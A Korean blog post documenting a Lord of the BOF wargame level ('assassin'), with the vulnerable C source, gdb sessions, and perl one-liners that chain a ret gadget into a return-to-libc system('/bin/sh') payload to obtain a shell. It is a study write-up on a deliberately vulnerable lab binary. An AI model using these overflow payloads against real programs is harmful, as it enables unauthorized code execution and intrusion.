오오.. 이번엔 뻥뚫리게 속시원하게 풀렸네여..
strace못쓰겟슴다.. 우선 사용방법부터 공부해야겠어여 써봤는데 해독을 못하게씀.. 무엇이 무엇인고
[giant@localhost giant]$ ls
assassas assassin assassin.c core
[giant@localhost giant]$ cat assassin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- assassin
- no stack, no RTL
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack retbayed you!\n");
exit(0);
}
if(argv[1][47] == '\x40')
{
printf("library retbayed you, too!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer+sfp hunter
memset(buffer, 0, 44);
}
/*소스를 보게되면 retbayed you라 하는데 이게 힌트같아보입니다. 잘 분석해보면 ret만 남습니다. ret는 변조할 수 있는것이죠! 근데 library에 들어있는 함수도 못쓰고 스택에 있는것도 못씁니다.. (막막)*/
[giant@localhost giant]$gdb -q
(gdb) p 0xbfffffff-0xbeffffff
$1 = 16777216
(gdb) zz
Undefined command: "zz". Try "help".
(gdb) q
[giant@localhost giant]$ ./assassas `perl -e 'print "A"x16777216'`
bash: ./assassas: Argument list too long // 꼼수시도해보려다가 망함ㅋ될리가 없죠..
[giant@localhost giant]$ [a]x44, [ret func]4bytes, [ret]<-system, [dummy], [/bin/sh]
bash: -system,: No such file or directory
[giant@localhost giant]$ bash2
[giant@localhost giant]$ gdb -q assassas
(gdb) b main
Breakpoint 1 at 0x8048476
(gdb) r
Starting program: /home/giant/assassas
Breakpoint 1, 0x8048476 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
The program is running. Exit anyway? (y or n) y
[giant@localhost giant]$ export BINSH=/bin/sh
[giant@localhost giant]$ vi whereis.c
[giant@localhost giant]$ gcc whereis.c -o getenv
whereis.c: In function `main':
whereis.c:5: warning: assignment makes pointer from integer without a cast
[giant@localhost giant]$ ./getenv BINSH
env is at: 0xbffffc88
[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\xff\xff\xff\xff", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @BBBBü ¿
Segmentation fault (core dumped)
[giant@localhost giant]$ gdb -q assassas core
Core was generated by `./assassas AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA @BBBBü ¿'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0xffffffff in ?? ()
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x28,%esp
0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push $0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add $0x4,%esp
0x8048489 <main+25>: push $0x0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add $0x4,%esp
0x8048493 <main+35>: mov 0xc(%ebp),%eax
0x8048496 <main+38>: add $0x4,%eax
0x8048499 <main+41>: mov (%eax),%edx
0x804849b <main+43>: add $0x2f,%edx
0x804849e <main+46>: cmpb $0xbf,(%edx)
0x80484a1 <main+49>: jne 0x80484c0 <main+80>
0x80484a3 <main+51>: push $0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add $0x4,%esp
0x80484b0 <main+64>: push $0x0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add $0x4,%esp
0x80484ba <main+74>: lea 0x0(%esi),%esi
0x80484c0 <main+80>: mov 0xc(%ebp),%eax
0x80484c3 <main+83>: add $0x4,%eax
0x80484c6 <main+86>: mov (%eax),%edx
0x80484c8 <main+88>: add $0x2f,%edx
---Type <return> to continue, or q <return> to quit---
0x80484cb <main+91>: cmpb $0x40,(%edx)
0x80484ce <main+94>: jne 0x80484e7 <main+119>
0x80484d0 <main+96>: push $0x8048591
0x80484d5 <main+101>: call 0x8048378 <printf>
0x80484da <main+106>: add $0x4,%esp
0x80484dd <main+109>: push $0x0
0x80484df <main+111>: call 0x8048388 <exit>
0x80484e4 <main+116>: add $0x4,%esp
0x80484e7 <main+119>: mov 0xc(%ebp),%eax
0x80484ea <main+122>: add $0x4,%eax
0x80484ed <main+125>: mov (%eax),%edx
0x80484ef <main+127>: push %edx
0x80484f0 <main+128>: lea 0xffffffd8(%ebp),%eax
0x80484f3 <main+131>: push %eax
0x80484f4 <main+132>: call 0x80483a8 <strcpy>
0x80484f9 <main+137>: add $0x8,%esp
0x80484fc <main+140>: lea 0xffffffd8(%ebp),%eax
0x80484ff <main+143>: push %eax
0x8048500 <main+144>: push $0x80485ae
0x8048505 <main+149>: call 0x8048378 <printf>
0x804850a <main+154>: add $0x8,%esp
0x804850d <main+157>: push $0x2c
0x804850f <main+159>: push $0x0
0x8048511 <main+161>: lea 0xffffffd8(%ebp),%eax
0x8048514 <main+164>: push %eax
0x8048515 <main+165>: call 0x8048398 <memset>
0x804851a <main+170>: add $0xc,%esp
0x804851d <main+173>: leave
0x804851e <main+174>: ret
---Type <return> to continue, or q <return> to quit---q
(gdb) q
[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x88\xfc\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBü ¿
sh: /sh: No such file or directory
Segmentation fault (core dumped)
[giant@localhost giant]$ ./assassas `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBü ¿
bash$ exit
exit
Segmentation fault (core dumped)
[giant@localhost giant]$ ./assassin `perl -e 'print "A"x44, "\x1e\x85\x04\x08", "\xe0\x8a\x05\x40", "B"x4, "\x84\xfc\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@BBBBü ¿
bash$ my-pass
euid = 515
지난번에 했던걸 응용(?)했다해야하나.. 전단계에 execve를 썼던건 실패해도 ret로 돌아가 다음 명령을 실행할 수 있어서 였는데 라이브러리 함수를 못쓰게 되니까 (당황->고민->멍때리는 시간을 거쳤..)생각해보니 팝콘형님이 비슷한 얘기를 해주신 적 있습니다. ret에 ret주소를 넣게되면 (ret= pop eip) eip가 pop되기도 하지만, pop라는 뜻은 esp도 4바이트 늘어난다는 뜻이기 때문에 다음 명령을 가르키고 있게 됩니다. 그 자리에 system함수의 주소를 넣고 4바이트 더미를 또 넣은 후 /bin/sh의 주소를 넣게되면 전 단계의 rtl과 같이 동작하게 됩니다.
'STUDY > Lord of the BOF' 카테고리의 다른 글
| assassin->zombie_assassin (2) | 2014.06.26 |
|---|---|
| assassin->zombie_assassin (0) | 2014.05.13 |
| bugbear->giant(1) (0) | 2014.04.16 |
| darkknight->bugbear (2) | 2014.04.07 |
| golem->darkknight (0) | 2014.04.06 |